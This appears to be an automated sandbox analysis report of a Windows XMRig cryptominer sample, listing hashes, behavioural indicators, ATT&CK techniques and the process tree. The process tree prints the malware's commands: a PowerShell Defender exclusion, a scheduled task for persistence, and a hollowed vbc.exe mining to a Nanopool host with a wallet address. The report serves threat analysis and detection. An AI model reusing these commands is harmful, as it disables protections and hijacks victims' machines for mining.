xmrig | 66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

Analysis

max time kernel
166s
max time network
150s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.3MB
MD5

8851bd99bb8728fa34a8a7afce73b36e
SHA1

d9a7790e4f41673f6a484180c717c778b258308e
SHA256

66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512

ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
SSDEEP

24576:n8E0T8wpeIq79Bu+pj+SRLQdqJptmfXCFIif/:nZ0TbpeIq7HumRLQkJpoKFIif

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1296-146-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1296-148-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1296-150-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1296-151-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1296-161-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1296-165-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1296-167-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

552 OWT.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

904 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 552 set thread context of 1296 552 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1304 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

840 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

1020 powershell.exe
1212 powershell.exe
552 OWT.exe
552 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
552	OWT.exe

pid	process
904	cmd.exe

description	pid	process	target process
PID 552 set thread context of 1296	552	OWT.exe	vbc.exe

pid	process
1304	schtasks.exe

pid	process
840	timeout.exe

pid	process
1020	powershell.exe
1212	powershell.exe
552	OWT.exe
552	OWT.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	960	file.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	552	OWT.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeLockMemoryPrivilege	1296	vbc.exe
Token: SeLockMemoryPrivilege	1296	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1296 vbc.exe

pid	process
1296	vbc.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 960 wrote to memory of 1020	960	file.exe	powershell.exe
PID 960 wrote to memory of 1020	960	file.exe	powershell.exe
PID 960 wrote to memory of 1020	960	file.exe	powershell.exe
PID 960 wrote to memory of 904	960	file.exe	cmd.exe
PID 960 wrote to memory of 904	960	file.exe	cmd.exe
PID 960 wrote to memory of 904	960	file.exe	cmd.exe
PID 904 wrote to memory of 840	904	cmd.exe	timeout.exe
PID 904 wrote to memory of 840	904	cmd.exe	timeout.exe
PID 904 wrote to memory of 840	904	cmd.exe	timeout.exe
PID 904 wrote to memory of 552	904	cmd.exe	OWT.exe
PID 904 wrote to memory of 552	904	cmd.exe	OWT.exe
PID 904 wrote to memory of 552	904	cmd.exe	OWT.exe
PID 552 wrote to memory of 1212	552	OWT.exe	powershell.exe
PID 552 wrote to memory of 1212	552	OWT.exe	powershell.exe
PID 552 wrote to memory of 1212	552	OWT.exe	powershell.exe
PID 552 wrote to memory of 1720	552	OWT.exe	cmd.exe
PID 552 wrote to memory of 1720	552	OWT.exe	cmd.exe
PID 552 wrote to memory of 1720	552	OWT.exe	cmd.exe
PID 1720 wrote to memory of 1304	1720	cmd.exe	schtasks.exe
PID 1720 wrote to memory of 1304	1720	cmd.exe	schtasks.exe
PID 1720 wrote to memory of 1304	1720	cmd.exe	schtasks.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe
PID 552 wrote to memory of 1296	552	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA8ED.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:840

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:1304

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
8851bd99bb8728fa34a8a7afce73b36e

SHA1
d9a7790e4f41673f6a484180c717c778b258308e

SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
8851bd99bb8728fa34a8a7afce73b36e

SHA1
d9a7790e4f41673f6a484180c717c778b258308e

SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA8ED.tmp.bat

Filesize
138B

MD5
05013e4ae014806749d76405572c30f9

SHA1
2b53081e377ed8beb5ebe23d861861a2a1d8b7f5

SHA256
50e41c5786843f5d98118a283ec938dc24a8433fbdbd6c6d5db4c15a9843b134

SHA512
7aecc155f07feaac85f60401d571f9c0c6223a96c7e0f7717908adf7c72b984a45ae7d00da4c151c5b9b7d72d2f4515fdd02ea5f24550ed93b1429e822bc5650

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c5ee1e447266db67e45e6b0ea112a2ae

SHA1
7307eebcabec0c7e7ed41b4237df1978d13b978a

SHA256
929fcaca80638b4e9a08d9d86f03c184c2f805c6748a9e05941e6d0e7b4280c6

SHA512
6dbfac3f42a0fd5af872a4a06fe7a0a940c31e632d07cd1ae14c89de9b7acad34585e8be93c7ee77e7a277056939c9e24469cd350b7dde2fc0c93e07f4068ca3

Download Submit
\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
8851bd99bb8728fa34a8a7afce73b36e

SHA1
d9a7790e4f41673f6a484180c717c778b258308e

SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f

Download Submit
memory/552-130-0x000007FEFC440000-0x000007FEFC462000-memory.dmp

Filesize
136KB

Download
memory/552-88-0x0000000000000000-mapping.dmp

Download
memory/552-125-0x000007FEFE2D0000-0x000007FEFE3A7000-memory.dmp

Filesize
860KB

Download
memory/552-122-0x0000000000860000-0x0000000000A1E000-memory.dmp

Filesize
1.7MB

Download
memory/552-123-0x0000000000600000-0x0000000000641000-memory.dmp

Filesize
260KB

Download
memory/552-105-0x000007FEFB2F0000-0x000007FEFB346000-memory.dmp

Filesize
344KB

Download
memory/552-129-0x000007FEFCE90000-0x000007FEFCEAF000-memory.dmp

Filesize
124KB

Download
memory/552-131-0x000007FEFC2F0000-0x000007FEFC307000-memory.dmp

Filesize
92KB

Download
memory/552-132-0x000007FEF0A10000-0x000007FEF0A2C000-memory.dmp

Filesize
112KB

Download
memory/552-133-0x000007FEF0A30000-0x000007FEF0A92000-memory.dmp

Filesize
392KB

Download
memory/552-110-0x000007FEF5EE0000-0x000007FEF600C000-memory.dmp

Filesize
1.2MB

Download
memory/552-109-0x0000000000860000-0x0000000000A1E000-memory.dmp

Filesize
1.7MB

Download
memory/552-108-0x0000000000860000-0x0000000000A1E000-memory.dmp

Filesize
1.7MB

Download
memory/552-166-0x0000000000860000-0x0000000000A1E000-memory.dmp

Filesize
1.7MB

Download
memory/552-140-0x000007FEFC110000-0x000007FEFC16B000-memory.dmp

Filesize
364KB

Download
memory/552-121-0x000007FEFB0D0000-0x000007FEFB2E5000-memory.dmp

Filesize
2.1MB

Download
memory/552-134-0x000007FEFE740000-0x000007FEFE78D000-memory.dmp

Filesize
308KB

Download
memory/552-107-0x0000000000600000-0x0000000000641000-memory.dmp

Filesize
260KB

Download
memory/552-135-0x000007FEF9900000-0x000007FEF9964000-memory.dmp

Filesize
400KB

Download
memory/552-98-0x000007FEFCD40000-0x000007FEFCDAC000-memory.dmp

Filesize
432KB

Download
memory/552-103-0x000007FEFE8B0000-0x000007FEFE9DD000-memory.dmp

Filesize
1.2MB

Download
memory/552-139-0x000007FEFCE50000-0x000007FEFCE86000-memory.dmp

Filesize
216KB

Download
memory/552-106-0x0000000000860000-0x0000000000A1E000-memory.dmp

Filesize
1.7MB

Download
memory/552-104-0x000007FEFDCC0000-0x000007FEFDEC3000-memory.dmp

Filesize
2.0MB

Download
memory/552-138-0x000007FEFA660000-0x000007FEFA687000-memory.dmp

Filesize
156KB

Download
memory/552-137-0x000007FEFC8C0000-0x000007FEFC8E5000-memory.dmp

Filesize
148KB

Download
memory/552-136-0x000007FEF9970000-0x000007FEF99E1000-memory.dmp

Filesize
452KB

Download
memory/552-102-0x000007FEF4620000-0x000007FEF500C000-memory.dmp

Filesize
9.9MB

Download
memory/552-99-0x000007FEFCEB0000-0x000007FEFCF21000-memory.dmp

Filesize
452KB

Download
memory/552-101-0x000007FEFE650000-0x000007FEFE72B000-memory.dmp

Filesize
876KB

Download
memory/552-100-0x000007FEF6280000-0x000007FEF6377000-memory.dmp

Filesize
988KB

Download
memory/552-92-0x000007FEFA530000-0x000007FEFA59F000-memory.dmp

Filesize
444KB

Download
memory/552-93-0x000007FEF6380000-0x000007FEF641C000-memory.dmp

Filesize
624KB

Download
memory/552-94-0x000007FEFEEF0000-0x000007FEFEF57000-memory.dmp

Filesize
412KB

Download
memory/552-95-0x0000000076BB0000-0x0000000076CAA000-memory.dmp

Filesize
1000KB

Download
memory/552-96-0x000007FEFE1B0000-0x000007FEFE24F000-memory.dmp

Filesize
636KB

Download
memory/552-97-0x0000000076A90000-0x0000000076BAF000-memory.dmp

Filesize
1.1MB

Download
memory/840-81-0x0000000000000000-mapping.dmp

Download
memory/904-75-0x0000000000000000-mapping.dmp

Download
memory/960-57-0x000007FEFEEF0000-0x000007FEFEF57000-memory.dmp

Filesize
412KB

Download
memory/960-58-0x0000000076BB0000-0x0000000076CAA000-memory.dmp

Filesize
1000KB

Download
memory/960-59-0x000007FEFE1B0000-0x000007FEFE24F000-memory.dmp

Filesize
636KB

Download
memory/960-61-0x000007FEFCD40000-0x000007FEFCDAC000-memory.dmp

Filesize
432KB

Download
memory/960-80-0x00000000004F0000-0x0000000000531000-memory.dmp

Filesize
260KB

Download
memory/960-60-0x0000000076A90000-0x0000000076BAF000-memory.dmp

Filesize
1.1MB

Download
memory/960-77-0x0000000000330000-0x00000000004EE000-memory.dmp

Filesize
1.7MB

Download
memory/960-76-0x000007FEFCE90000-0x000007FEFCEAF000-memory.dmp

Filesize
124KB

Download
memory/960-72-0x000007FEF6010000-0x000007FEF613C000-memory.dmp

Filesize
1.2MB

Download
memory/960-71-0x0000000000330000-0x00000000004EE000-memory.dmp

Filesize
1.7MB

Download
memory/960-70-0x000007FEFB2F0000-0x000007FEFB346000-memory.dmp

Filesize
344KB

Download
memory/960-69-0x000007FEFDCC0000-0x000007FEFDEC3000-memory.dmp

Filesize
2.0MB

Download
memory/960-56-0x000007FEFA500000-0x000007FEFA59C000-memory.dmp

Filesize
624KB

Download
memory/960-68-0x000007FEFE8B0000-0x000007FEFE9DD000-memory.dmp

Filesize
1.2MB

Download
memory/960-67-0x000007FEF5010000-0x000007FEF59FC000-memory.dmp

Filesize
9.9MB

Download
memory/960-55-0x000007FEFA6E0000-0x000007FEFA74F000-memory.dmp

Filesize
444KB

Download
memory/960-64-0x000007FEFE650000-0x000007FEFE72B000-memory.dmp

Filesize
876KB

Download
memory/960-66-0x00000000004F0000-0x0000000000531000-memory.dmp

Filesize
260KB

Download
memory/960-65-0x0000000000330000-0x00000000004EE000-memory.dmp

Filesize
1.7MB

Download
memory/960-63-0x000007FEF6320000-0x000007FEF6417000-memory.dmp

Filesize
988KB

Download
memory/960-62-0x000007FEFCEB0000-0x000007FEFCF21000-memory.dmp

Filesize
452KB

Download
memory/1020-82-0x000007FEF4EA0000-0x000007FEF59FD000-memory.dmp

Filesize
11.4MB

Download
memory/1020-83-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1020-73-0x0000000000000000-mapping.dmp

Download
memory/1020-74-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

Filesize
8KB

Download
memory/1020-78-0x000007FEECA70000-0x000007FEED493000-memory.dmp

Filesize
10.1MB

Download
memory/1020-84-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1020-86-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1020-85-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1212-115-0x000007FEEB570000-0x000007FEEC0CD000-memory.dmp

Filesize
11.4MB

Download
memory/1212-126-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/1212-111-0x0000000000000000-mapping.dmp

Download
memory/1212-124-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1212-127-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1212-116-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1212-118-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1212-128-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/1212-114-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/1296-151-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-168-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1296-142-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-144-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-146-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-148-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-150-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-141-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-161-0x0000000140343234-mapping.dmp

Download
memory/1296-165-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1296-169-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1296-167-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1304-120-0x0000000000000000-mapping.dmp

Download
memory/1720-119-0x0000000000000000-mapping.dmp

Download